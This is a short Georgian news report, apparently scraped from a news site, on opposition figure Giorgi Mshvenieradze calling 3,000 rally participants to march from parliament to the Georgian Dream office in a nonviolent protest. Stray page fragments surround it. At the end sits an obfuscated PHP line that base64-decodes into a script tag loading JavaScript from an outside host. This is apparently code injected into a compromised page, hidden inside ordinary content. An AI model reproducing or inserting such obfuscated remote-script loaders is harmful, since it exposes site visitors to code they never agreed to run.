celsiusi
ავერსი საქკაბელი
პარლამენტის წინ შეკრებილებიდან 3 000 ადამიანი "ქართული ოცნების" ოფისთან გადაინაცვლებს - ამის შესახებ ინიციატივა ტრიბუნიდან გიორგი მშვენიერაძემ გააჟღერა და თქვა, რომ ამ ადამიანებს წინ თავად გაუძღვება. 
 
მშვენიერაძემ ხაზგასმით აღნიშნა, რომ ეს იქნება პირველი კერა და მათი მოქმედება იქნება არაძალადობრივი. 
 
"პირველ ნაბიჯს გადავდგამთ, რადგან ხელისუფლებას 1 საათსა და 40 წუთში ეწურება ვადა, რომელიც ქართველმა ხალხმა მისცა. ეს ვადა იყო, გადამდგარიყო სამარცხვინო ღარიბაშვილი, მისი სამარცხვინო მთავრობით და მოგვცემოდა საშუალება, შეგვექმნა ეროვნული თანხმობის მთავრობა...
 
პირველი ნაბიჯი - გვჭირდება 3 000 ადამიანი თქვენგან, რომელიც მზად იქნება, მივიდეთ პირველ სიმბოლოსთან-"ქართული ოცნების" ოფისთან. აქედან 3 000 ადამიანი არც მეტი, არც ნაკლები! მე წამოვალ წინ და 3 000 ადამიანი ვდგებით "ქართული ოცნების" ოფისთან. დანარჩენები ვრჩებით აქ და იქნება პირველი დამოუკიდებელი კერა, სადაც იქნება არაძალადობრივი, მაგრამ მკაცრი აქცია" ,- თქვა მშვენიერაძემ. 
 
გიორგი მშვენიერაძემ თქვა, რომ თუ ხელისუფლება მომდევნო წუთებში არ გადადგამს ნაბიჯს უკან, ასეთი კერა ბევრი გაჩნდება. 
515
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");